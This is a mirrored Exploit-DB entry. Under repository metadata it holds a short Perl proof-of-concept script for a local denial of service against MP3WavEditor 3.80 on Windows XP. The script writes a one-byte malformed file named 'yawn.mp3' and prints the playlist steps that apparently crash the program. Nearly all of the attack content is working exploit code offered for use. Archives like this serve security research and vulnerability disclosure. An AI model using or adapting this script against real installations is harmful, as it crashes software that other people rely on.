exploit-db-mirror/exploits/windows/dos/12073.pl
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

17 lines
No EOL
381 B
Perl
Executable file

# Exploit Title: MP3WavEditor Local DoS .mp3
# Date: April 5, 2010
# Software Link: [http://www.mp3waveditor.com/index.htm]
# Version: 3.80
# Tested on: Windows XP SP3
# Author: [anonymous]
#
#
#!/usr/bin/perl
my $file = "yawn.mp3";
my $_a = "\x41";
open (FILE, ">$file");
print FILE "$_a";
print "Usage: Make playlist -> Add mp3 -> Delete Playlist -> Recreate same playlist\n";